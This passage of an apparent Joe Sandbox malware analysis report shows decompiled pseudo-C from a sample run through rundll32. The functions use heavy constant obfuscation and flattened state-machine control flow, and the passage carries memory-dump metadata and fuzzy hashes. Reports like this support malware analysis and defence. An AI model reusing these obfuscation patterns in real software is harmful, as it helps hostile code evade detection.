                                                                                                                                    										_t306 = E002C8F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
                                                                                                                                    										_t340 = _t306;
                                                                                                                                    										_t347 = _t347 + 0x28;
                                                                                                                                    										__eflags = _t306 - 0xffffffff;
                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                    											_t310 = 0x31db0c0;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										if(_t310 == 0xada6804) {
                                                                                                                                    											_t310 = 0xcbcd90e;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t310 != 0xcbcd90e) {
                                                                                                                                    												goto L15;
                                                                                                                                    											} else {
                                                                                                                                    												E002DC1EC(_v684, _v592,  &_v572);
                                                                                                                                    												_t310 = 0x10c1a7f;
                                                                                                                                    												continue;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L18:
                                                                                                                                    						return _t309;
                                                                                                                                    					}
                                                                                                                                    					_v572 = _v572 - E002DABD1();
                                                                                                                                    					_t310 = 0x461819e;
                                                                                                                                    					asm("sbb [esp+0x8c], edx");
                                                                                                                                    					L15:
                                                                                                                                    					__eflags = _t310 - 0x7e6efe8;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L18;
                                                                                                                                    			}
                                                                                                                                    0x002d99aa
                                                                                                                                    0x002d99b2
                                                                                                                                    0x002d99b7
                                                                                                                                    0x002d99bc
                                                                                                                                    0x002d99c4
                                                                                                                                    0x002d99cc
                                                                                                                                    0x002d99cc
                                                                                                                                    0x002d99da
                                                                                                                                    0x002d9afd
                                                                                                                                    0x002d9b06
                                                                                                                                    0x002d9b0d
                                                                                                                                    0x002d9b0e
                                                                                                                                    0x002d9b15
                                                                                                                                    0x002d9b1c
                                                                                                                                    0x002d9b23
                                                                                                                                    0x002d9b32
                                                                                                                                    0x002d9b3d
                                                                                                                                    0x002d9b49
                                                                                                                                    0x002d9b54
                                                                                                                                    0x002d9b62
                                                                                                                                    0x002d9b69
                                                                                                                                    0x002d9b70
                                                                                                                                    0x002d9b74
                                                                                                                                    0x002d9b76
                                                                                                                                    0x002d9b79
                                                                                                                                    0x00000000
                                                                                                                                    0x002d99e0
                                                                                                                                    0x002d99e6
                                                                                                                                    0x002d9a87
                                                                                                                                    0x002d9a90
                                                                                                                                    0x002d9a98
                                                                                                                                    0x002d9a9e
                                                                                                                                    0x002d9aac
                                                                                                                                    0x002d9ac3
                                                                                                                                    0x002d9ad6
                                                                                                                                    0x002d9aeb
                                                                                                                                    0x002d9af0
                                                                                                                                    0x002d9af3
                                                                                                                                    0x00000000
                                                                                                                                    0x002d99ec
                                                                                                                                    0x002d99f2
                                                                                                                                    0x002d9bba
                                                                                                                                    0x002d99f8
                                                                                                                                    0x002d99fe
                                                                                                                                    0x002d9a6d
                                                                                                                                    0x002d9a72
                                                                                                                                    0x002d9a74
                                                                                                                                    0x002d9a77
                                                                                                                                    0x002d9a7a
                                                                                                                                    0x002d9a80
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a80
                                                                                                                                    0x002d9a00
                                                                                                                                    0x002d9a06
                                                                                                                                    0x002d9a31
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a08
                                                                                                                                    0x002d9a0e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a14
                                                                                                                                    0x002d9a24
                                                                                                                                    0x002d9a2a
                                                                                                                                    0x00000000
                                                                                                                                    0x002d9a2a
                                                                                                                                    0x002d9a0e
                                                                                                                                    0x002d9a06
                                                                                                                                    0x002d99fe
                                                                                                                                    0x002d99f2
                                                                                                                                    0x002d99e6
                                                                                                                                    0x002d9bc5
                                                                                                                                    0x002d9bce
                                                                                                                                    0x002d9bce
                                                                                                                                    0x002d9b88
                                                                                                                                    0x002d9b8f
                                                                                                                                    0x002d9b94
                                                                                                                                    0x002d9b9b
                                                                                                                                    0x002d9b9b
                                                                                                                                    0x002d9b9b
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: HwP$QjTF$aH3
                                                                                                                                    • API String ID: 0-3950587752
                                                                                                                                    • Opcode ID: 7d5fa79a37f13ac2799d8d5334ca98fa4fdb8a289eaa83b54273813434884abf
                                                                                                                                    • Instruction ID: 2cba7bbf03e7401c339d5ba89124bf19420b602c82d897491e3bcaa851091f02
                                                                                                                                    • Opcode Fuzzy Hash: 7d5fa79a37f13ac2799d8d5334ca98fa4fdb8a289eaa83b54273813434884abf
                                                                                                                                    • Instruction Fuzzy Hash: 3CE11F714093819FD768CF25D58A65BBBE1FBC4748F208E1EF29686260D7B18989CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002CB2C7(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                    				char _v40;
                                                                                                                                    				char _v48;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				intOrPtr _v80;
                                                                                                                                    				intOrPtr _v84;
                                                                                                                                    				intOrPtr _v92;
                                                                                                                                    				char _v108;
                                                                                                                                    				char _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				void* _t137;
                                                                                                                                    				intOrPtr* _t157;
                                                                                                                                    				signed int _t166;
                                                                                                                                    				void* _t173;
                                                                                                                                    				intOrPtr _t191;
                                                                                                                                    				void* _t203;
                                                                                                                                    				void* _t208;
                                                                                                                                    				signed int _t209;
                                                                                                                                    				signed int _t210;
                                                                                                                                    				signed int _t211;
                                                                                                                                    				signed int _t212;
                                                                                                                                    				intOrPtr* _t213;
                                                                                                                                    				void* _t215;
                                                                                                                                    				void* _t216;
                                                                                                                                    				void* _t218;
                                                                                                                                    
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t137);
                                                                                                                                    				_v136 = 0x2c5bc;
                                                                                                                                    				_t216 = _t215 + 0xc;
                                                                                                                                    				_t208 = 0;
                                                                                                                                    				_t173 = 0xf62a13b;
                                                                                                                                    				_t209 = 0x63;
                                                                                                                                    				_v136 = _v136 / _t209;
                                                                                                                                    				_v136 = _v136 + 0xe356;
                                                                                                                                    				_v136 = _v136 ^ 0x000982ba;
                                                                                                                                    				_v156 = 0x35028b;
                                                                                                                                    				_v156 = _v156 | 0x143a760d;
                                                                                                                                    				_v156 = _v156 + 0xfffff236;
                                                                                                                                    				_v156 = _v156 ^ 0x8a3e1055;
                                                                                                                                    				_v156 = _v156 ^ 0x9e033c32;
                                                                                                                                    				_v128 = 0xf43d73;
                                                                                                                                    				_v128 = _v128 | 0xd1983256;
                                                                                                                                    				_v128 = _v128 ^ 0xd1f71de4;
                                                                                                                                    				_v120 = 0x9951cf;
                                                                                                                                    				_v120 = _v120 + 0xffffd11b;
                                                                                                                                    				_v120 = _v120 ^ 0x00948e71;
                                                                                                                                    				_v152 = 0x57fc5b;
                                                                                                                                    				_v152 = _v152 | 0x88a856bb;
                                                                                                                                    				_v152 = _v152 << 9;
                                                                                                                                    				_v152 = _v152 + 0xa27f;
                                                                                                                                    				_v152 = _v152 ^ 0xfff91174;
                                                                                                                                    				_v116 = 0x3d6e6b;
                                                                                                                                    				_t210 = 9;
                                                                                                                                    				_v116 = _v116 / _t210;
                                                                                                                                    				_v116 = _v116 ^ 0x0006b75d;
                                                                                                                                    				_v140 = 0x916f20;
                                                                                                                                    				_t211 = 0x35;
                                                                                                                                    				_v140 = _v140 * 0x22;
                                                                                                                                    				_v140 = _v140 / _t211;
                                                                                                                                    				_t212 = 0x7b;
                                                                                                                                    				_v140 = _v140 * 0x1d;
                                                                                                                                    				_v140 = _v140 ^ 0x0a9423e2;
                                                                                                                                    				_v148 = 0x96f30f;
                                                                                                                                    				_v148 = _v148 ^ 0x6547be83;
                                                                                                                                    				_v148 = _v148 << 9;
                                                                                                                                    				_v148 = _v148 | 0xa101889a;
                                                                                                                                    				_v148 = _v148 ^ 0xa391ec3d;
                                                                                                                                    				_v124 = 0x9e8998;
                                                                                                                                    				_v124 = _v124 | 0x73c531f9;
                                                                                                                                    				_v124 = _v124 ^ 0x73d6e9c9;
                                                                                                                                    				_v132 = 0xda1f74;
                                                                                                                                    				_v132 = _v132 + 0x97a0;
                                                                                                                                    				_v132 = _v132 ^ 0xdacfb227;
                                                                                                                                    				_v132 = _v132 ^ 0xda161b2e;
                                                                                                                                    				_v144 = 0x87027b;
                                                                                                                                    				_t213 = _v128;
                                                                                                                                    				_v144 = _v144 / _t212;
                                                                                                                                    				_v144 = _v144 + 0x3568;
                                                                                                                                    				_v144 = _v144 | 0x38a39b99;
                                                                                                                                    				_v144 = _v144 ^ 0x38a88a96;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t218 = _t173 - 0x628c872;
                                                                                                                                    					if(_t218 > 0) {
                                                                                                                                    						goto L25;
                                                                                                                                    					}
                                                                                                                                    					L2:
                                                                                                                                    					if(_t218 == 0) {
                                                                                                                                    						_push(_t173);
                                                                                                                                    						_push(_t173);
                                                                                                                                    						_t203 = 0x50;
                                                                                                                                    						_t213 = E002C7FF2(_t203);
                                                                                                                                    						__eflags = _t213;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							L16:
                                                                                                                                    							_t173 = 0xe7b6043;
                                                                                                                                    							continue;
                                                                                                                                    							do {
                                                                                                                                    								while(1) {
                                                                                                                                    									_t218 = _t173 - 0x628c872;
                                                                                                                                    									if(_t218 > 0) {
                                                                                                                                    										goto L25;
                                                                                                                                    									}
                                                                                                                                    									goto L2;
                                                                                                                                    								}
                                                                                                                                    								goto L25;
                                                                                                                                    								L45:
                                                                                                                                    								__eflags = _t173 - 0xee0c843;
                                                                                                                                    							} while (__eflags != 0);
                                                                                                                                    							L46:
                                                                                                                                    							return _t208;
                                                                                                                                    						}
                                                                                                                                    						_t173 = 0xf1dea2;
                                                                                                                                    						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
                                                                                                                                    						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
                                                                                                                                    						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t173 == 0xf1dea2) {
                                                                                                                                    						__eflags = _v84 - 1;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002D4B87( &_v108);
                                                                                                                                    							L13:
                                                                                                                                    							_t173 = 0x4d68783;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						_t173 = 0x9ca47b0;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t173 == 0x1c23c86) {
                                                                                                                                    						__eflags = _v84 - 4;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002D6DF8( &_v108);
                                                                                                                                    							goto L13;
                                                                                                                                    						}
                                                                                                                                    						_t173 = 0x6a06f56;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t173 == 0x45d7e1c) {
                                                                                                                                    						_t157 = E002DD97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
                                                                                                                                    						_t216 = _t216 + 0xc;
                                                                                                                                    						__eflags = _t157;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							goto L46;
                                                                                                                                    						}
                                                                                                                                    						goto L16;
                                                                                                                                    					}
                                                                                                                                    					if(_t173 == 0x483085d) {
                                                                                                                                    						__eflags = _v84 - 7;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002D0E53( &_v108);
                                                                                                                                    						}
                                                                                                                                    						goto L13;
                                                                                                                                    					}
                                                                                                                                    					if(_t173 == 0x4d68783) {
                                                                                                                                    						_t191 =  *0x2e3208; // 0x0
                                                                                                                                    						_t208 = _t208 + 1;
                                                                                                                                    						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
                                                                                                                                    						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
                                                                                                                                    						L10:
                                                                                                                                    						_t173 = 0x45d7e1c;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					if(_t173 != 0x4fb7fc6) {
                                                                                                                                    						goto L45;
                                                                                                                                    					}
                                                                                                                                    					E002D0B19(0);
                                                                                                                                    					goto L10;
                                                                                                                                    					L25:
                                                                                                                                    					__eflags = _t173 - 0x6a06f56;
                                                                                                                                    					if(_t173 == 0x6a06f56) {
                                                                                                                                    						__eflags = _v84 - 5;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002CB74D( &_v108, _t213);
                                                                                                                                    							_t173 = 0x4d68783;
                                                                                                                                    							goto L45;
                                                                                                                                    						}
                                                                                                                                    						_t173 = 0xcf2e7b4;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t173 - 0x9a20357;
                                                                                                                                    					if(_t173 == 0x9a20357) {
                                                                                                                                    						__eflags = _v84 - 3;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002D1889( &_v108);
                                                                                                                                    							goto L13;
                                                                                                                                    						}
                                                                                                                                    						_t173 = 0x1c23c86;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t173 - 0x9ca47b0;
                                                                                                                                    					if(_t173 == 0x9ca47b0) {
                                                                                                                                    						__eflags = _v84 - 2;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002C9714( &_v108, _t213);
                                                                                                                                    							goto L13;
                                                                                                                                    						}
                                                                                                                                    						_t173 = 0x9a20357;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t173 - 0xcf2e7b4;
                                                                                                                                    					if(_t173 == 0xcf2e7b4) {
                                                                                                                                    						__eflags = _v84 - 6;
                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                    							E002CF09B( &_v108);
                                                                                                                                    							goto L13;
                                                                                                                                    						}
                                                                                                                                    						_t173 = 0x483085d;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t173 - 0xe7b6043;
                                                                                                                                    					if(_t173 == 0xe7b6043) {
                                                                                                                                    						_t166 = E002CE5CF( &_v48, _v140,  &_v112, _v148);
                                                                                                                                    						asm("sbb ecx, ecx");
                                                                                                                                    						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t173 - 0xf62a13b;
                                                                                                                                    					if(_t173 != 0xf62a13b) {
                                                                                                                                    						goto L45;
                                                                                                                                    					}
                                                                                                                                    					E002C3DBC( &_v40, _a4, _v136, _v156, _v128);
                                                                                                                                    					_t216 = _t216 + 0xc;
                                                                                                                                    					_t173 = 0x4fb7fc6;
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x002cb6ce
                                                                                                                                    0x002cb584
                                                                                                                                    0x002cb589
                                                                                                                                    0x002cb590
                                                                                                                                    0x002cb597
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb597
                                                                                                                                    0x002cb48f
                                                                                                                                    0x002cb546
                                                                                                                                    0x002cb54b
                                                                                                                                    0x002cb55b
                                                                                                                                    0x002cb4e6
                                                                                                                                    0x002cb4e6
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4e6
                                                                                                                                    0x002cb54d
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb54d
                                                                                                                                    0x002cb49b
                                                                                                                                    0x002cb52a
                                                                                                                                    0x002cb52f
                                                                                                                                    0x002cb53f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb53f
                                                                                                                                    0x002cb531
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb531
                                                                                                                                    0x002cb4a3
                                                                                                                                    0x002cb510
                                                                                                                                    0x002cb515
                                                                                                                                    0x002cb518
                                                                                                                                    0x002cb51a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb51a
                                                                                                                                    0x002cb4ab
                                                                                                                                    0x002cb4df
                                                                                                                                    0x002cb4e4
                                                                                                                                    0x002cb4ee
                                                                                                                                    0x002cb4ee
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4e4
                                                                                                                                    0x002cb4af
                                                                                                                                    0x002cb4c8
                                                                                                                                    0x002cb4ce
                                                                                                                                    0x002cb4d5
                                                                                                                                    0x002cb4d7
                                                                                                                                    0x002cb4c4
                                                                                                                                    0x002cb4c4
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4c4
                                                                                                                                    0x002cb4b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb4bf
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb59f
                                                                                                                                    0x002cb59f
                                                                                                                                    0x002cb5a5
                                                                                                                                    0x002cb698
                                                                                                                                    0x002cb69d
                                                                                                                                    0x002cb6af
                                                                                                                                    0x002cb6b4
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb6b4
                                                                                                                                    0x002cb69f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb69f
                                                                                                                                    0x002cb5ab
                                                                                                                                    0x002cb5b1
                                                                                                                                    0x002cb679
                                                                                                                                    0x002cb67e
                                                                                                                                    0x002cb68e
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb68e
                                                                                                                                    0x002cb680
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb680
                                                                                                                                    0x002cb5b7
                                                                                                                                    0x002cb5bd
                                                                                                                                    0x002cb658
                                                                                                                                    0x002cb65d
                                                                                                                                    0x002cb66f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb66f
                                                                                                                                    0x002cb65f
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb65f
                                                                                                                                    0x002cb5c3
                                                                                                                                    0x002cb5c9
                                                                                                                                    0x002cb639
                                                                                                                                    0x002cb63e
                                                                                                                                    0x002cb64e
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb64e
                                                                                                                                    0x002cb640
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb640
                                                                                                                                    0x002cb5cb
                                                                                                                                    0x002cb5d1
                                                                                                                                    0x002cb61f
                                                                                                                                    0x002cb62a
                                                                                                                                    0x002cb632
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb632
                                                                                                                                    0x002cb5d3
                                                                                                                                    0x002cb5d9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002cb5f9
                                                                                                                                    0x002cb5fe
                                                                                                                                    0x002cb601
                                                                                                                                    0x002cb601

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: V$h5$kn=
                                                                                                                                    • API String ID: 0-2568719763
                                                                                                                                    • Opcode ID: de90a281a66467c0ee3f1301a25f3b6677fc913ec68bf46d8ecd13a1e64a1d71
                                                                                                                                    • Instruction ID: 103334b105198def60882d7468af3b1f042e7678fdade5a91d4bdc45bffb2efc
                                                                                                                                    • Opcode Fuzzy Hash: de90a281a66467c0ee3f1301a25f3b6677fc913ec68bf46d8ecd13a1e64a1d71
                                                                                                                                    • Instruction Fuzzy Hash: 44A1AC7012C341CBC729CF25D4A6A2FBBE0EB94308F144A2EF18696261D7758A19CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E002D4116() {
                                                                                                                                    				char _v524;
                                                                                                                                    				intOrPtr _v548;
                                                                                                                                    				char _v564;
                                                                                                                                    				intOrPtr _v568;
                                                                                                                                    				char _v572;
                                                                                                                                    				signed int _v576;
                                                                                                                                    				signed int _v580;
                                                                                                                                    				signed int _v584;
                                                                                                                                    				signed int _v588;
                                                                                                                                    				signed int _v592;
                                                                                                                                    				signed int _v596;
                                                                                                                                    				signed int _v600;
                                                                                                                                    				signed int _v604;
                                                                                                                                    				signed int _v608;
                                                                                                                                    				signed int _v612;
                                                                                                                                    				signed int _v616;
                                                                                                                                    				signed int _v620;
                                                                                                                                    				signed int _v624;
                                                                                                                                    				signed int _v628;
                                                                                                                                    				signed int _v632;
                                                                                                                                    				signed int _v636;
                                                                                                                                    				signed int _v640;
                                                                                                                                    				signed int _v644;
                                                                                                                                    				signed int _v648;
                                                                                                                                    				signed int _v652;
                                                                                                                                    				signed int _v656;
                                                                                                                                    				signed int _t220;
                                                                                                                                    				signed int _t222;
                                                                                                                                    				void* _t224;
                                                                                                                                    				void* _t226;
                                                                                                                                    				void* _t227;
                                                                                                                                    				signed int _t229;
                                                                                                                                    				signed int _t230;
                                                                                                                                    				signed int _t231;
                                                                                                                                    				signed int _t232;
                                                                                                                                    				signed int _t233;
                                                                                                                                    				signed int _t250;
                                                                                                                                    				void* _t253;
                                                                                                                                    				void* _t258;
                                                                                                                                    				void* _t260;
                                                                                                                                    
                                                                                                                                    				_v604 = 0x9b146b;
                                                                                                                                    				_v604 = _v604 | 0x658b3ccc;
                                                                                                                                    				_v604 = _v604 + 0xfffff1f3;
                                                                                                                                    				_v604 = _v604 ^ 0x659b2e62;
                                                                                                                                    				_v596 = 0xb07d39;
                                                                                                                                    				_v596 = _v596 | 0x89b98cff;
                                                                                                                                    				_v596 = _v596 ^ 0x89b9fdfe;
                                                                                                                                    				_v584 = 0x342693;
                                                                                                                                    				_v584 = _v584 ^ 0x5537c6ac;
                                                                                                                                    				_v584 = _v584 ^ 0x5503e03c;
                                                                                                                                    				_v628 = 0x844a73;
                                                                                                                                    				_v628 = _v628 | 0x8aea995b;
                                                                                                                                    				_v628 = _v628 >> 3;
                                                                                                                                    				_v628 = _v628 ^ 0x3316179a;
                                                                                                                                    				_v628 = _v628 ^ 0x224eeca0;
                                                                                                                                    				_v644 = 0xac1c02;
                                                                                                                                    				_v644 = _v644 * 0x6d;
                                                                                                                                    				_t227 = 0;
                                                                                                                                    				_v644 = _v644 << 0xf;
                                                                                                                                    				_t253 = 0x9728f62;
                                                                                                                                    				_t229 = 0x52;
                                                                                                                                    				_v644 = _v644 * 0x23;
                                                                                                                                    				_v644 = _v644 ^ 0xb0e78180;
                                                                                                                                    				_v636 = 0x949b2b;
                                                                                                                                    				_v636 = _v636 / _t229;
                                                                                                                                    				_v636 = _v636 << 4;
                                                                                                                                    				_t230 = 0x48;
                                                                                                                                    				_v636 = _v636 / _t230;
                                                                                                                                    				_v636 = _v636 ^ 0x000805f9;
                                                                                                                                    				_v652 = 0x50f951;
                                                                                                                                    				_v652 = _v652 << 0xe;
                                                                                                                                    				_v652 = _v652 + 0xffff7357;
                                                                                                                                    				_v652 = _v652 >> 5;
                                                                                                                                    				_v652 = _v652 ^ 0x01f330c3;
                                                                                                                                    				_v624 = 0xa7ee55;
                                                                                                                                    				_v624 = _v624 + 0x328f;
                                                                                                                                    				_t231 = 0x36;
                                                                                                                                    				_v624 = _v624 / _t231;
                                                                                                                                    				_v624 = _v624 + 0x3260;
                                                                                                                                    				_v624 = _v624 ^ 0x000caec1;
                                                                                                                                    				_v632 = 0x45b476;
                                                                                                                                    				_v632 = _v632 << 0xf;
                                                                                                                                    				_v632 = _v632 + 0x3fe9;
                                                                                                                                    				_v632 = _v632 + 0xffffc242;
                                                                                                                                    				_v632 = _v632 ^ 0xda30ae70;
                                                                                                                                    				_v576 = 0xb3f46f;
                                                                                                                                    				_v576 = _v576 >> 0xe;
                                                                                                                                    				_v576 = _v576 ^ 0x000becca;
                                                                                                                                    				_v640 = 0x899e10;
                                                                                                                                    				_v640 = _v640 << 3;
                                                                                                                                    				_v640 = _v640 | 0x15c6522a;
                                                                                                                                    				_v640 = _v640 >> 0xc;
                                                                                                                                    				_v640 = _v640 ^ 0x00018fe0;
                                                                                                                                    				_v648 = 0x6b2405;
                                                                                                                                    				_v648 = _v648 | 0xec8a856c;
                                                                                                                                    				_v648 = _v648 + 0xffffe7b2;
                                                                                                                                    				_v648 = _v648 >> 0xd;
                                                                                                                                    				_v648 = _v648 ^ 0x000a0717;
                                                                                                                                    				_v608 = 0xd62f5d;
                                                                                                                                    				_v608 = _v608 + 0xffffa804;
                                                                                                                                    				_v608 = _v608 >> 1;
                                                                                                                                    				_v608 = _v608 ^ 0x00686b18;
                                                                                                                                    				_v580 = 0x2fce72;
                                                                                                                                    				_t232 = 6;
                                                                                                                                    				_v580 = _v580 / _t232;
                                                                                                                                    				_v580 = _v580 ^ 0x000627ef;
                                                                                                                                    				_v612 = 0xa7d19a;
                                                                                                                                    				_v612 = _v612 ^ 0x125f9685;
                                                                                                                                    				_v612 = _v612 ^ 0x35fdcbd7;
                                                                                                                                    				_v612 = _v612 ^ 0x270c67d8;
                                                                                                                                    				_v656 = 0x784491;
                                                                                                                                    				_v656 = _v656 >> 9;
                                                                                                                                    				_v656 = _v656 | 0xfbff7fff;
                                                                                                                                    				_v656 = _v656 ^ 0xfbf9abc9;
                                                                                                                                    				_v616 = 0xc21bdd;
                                                                                                                                    				_t233 = 0x58;
                                                                                                                                    				_v616 = _v616 / _t233;
                                                                                                                                    				_v616 = _v616 | 0xde7eb344;
                                                                                                                                    				_v616 = _v616 ^ 0xde714edb;
                                                                                                                                    				_v620 = 0x22ba29;
                                                                                                                                    				_v620 = _v620 + 0xc334;
                                                                                                                                    				_v620 = _v620 ^ 0x41b5236d;
                                                                                                                                    				_v620 = _v620 ^ 0x4193ad78;
                                                                                                                                    				_v588 = 0x61092c;
                                                                                                                                    				_v588 = _v588 | 0xfbe761ce;
                                                                                                                                    				_v588 = _v588 ^ 0xfbe7142a;
                                                                                                                                    				_v600 = 0xd9609d;
                                                                                                                                    				_v600 = _v600 | 0x95d54fcb;
                                                                                                                                    				_v600 = _v600 ^ 0x95d705b7;
                                                                                                                                    				_v592 = 0xc80f6b;
                                                                                                                                    				_t234 = 0x42;
                                                                                                                                    				_t252 = _v600;
                                                                                                                                    				_v592 = _v592 / _t234;
                                                                                                                                    				_v592 = _v592 ^ 0x0000156e;
                                                                                                                                    				do {
                                                                                                                                    					while(_t253 != 0x25f6a69) {
                                                                                                                                    						if(_t253 == 0x9728f62) {
                                                                                                                                    							_t253 = 0xea70970;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t253 == 0x9c0fe90) {
                                                                                                                                    								_t250 = _v632;
                                                                                                                                    								_t220 = E002C8F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
                                                                                                                                    								_t252 = _t220;
                                                                                                                                    								_t260 = _t260 + 0x28;
                                                                                                                                    								__eflags = _t220 - 0xffffffff;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_t253 = 0xaccbeb9;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t253 == 0xaccbeb9) {
                                                                                                                                    									_t222 = E002C9350( &_v564, _t252, _v608, _v580, _t234, _v612);
                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                    									_t250 = _v616;
                                                                                                                                    									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
                                                                                                                                    									_t234 = _v656;
                                                                                                                                    									E002D1E67(_v656, _t250, _v620, _v588, _t252);
                                                                                                                                    									_t260 = _t260 + 0x20;
                                                                                                                                    									goto L14;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t253 == 0xdba0984) {
                                                                                                                                    										_t224 = E002DABD1();
                                                                                                                                    										_t258 = _v572 - _v548;
                                                                                                                                    										asm("sbb ecx, [esp+0x84]");
                                                                                                                                    										__eflags = _v568 - _t250;
                                                                                                                                    										if(__eflags >= 0) {
                                                                                                                                    											if(__eflags > 0) {
                                                                                                                                    												L19:
                                                                                                                                    												_t227 = 1;
                                                                                                                                    												__eflags = 1;
                                                                                                                                    											} else {
                                                                                                                                    												__eflags = _t258 - _t224;
                                                                                                                                    												if(_t258 >= _t224) {
                                                                                                                                    													goto L19;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										_t268 = _t253 - 0xea70970;
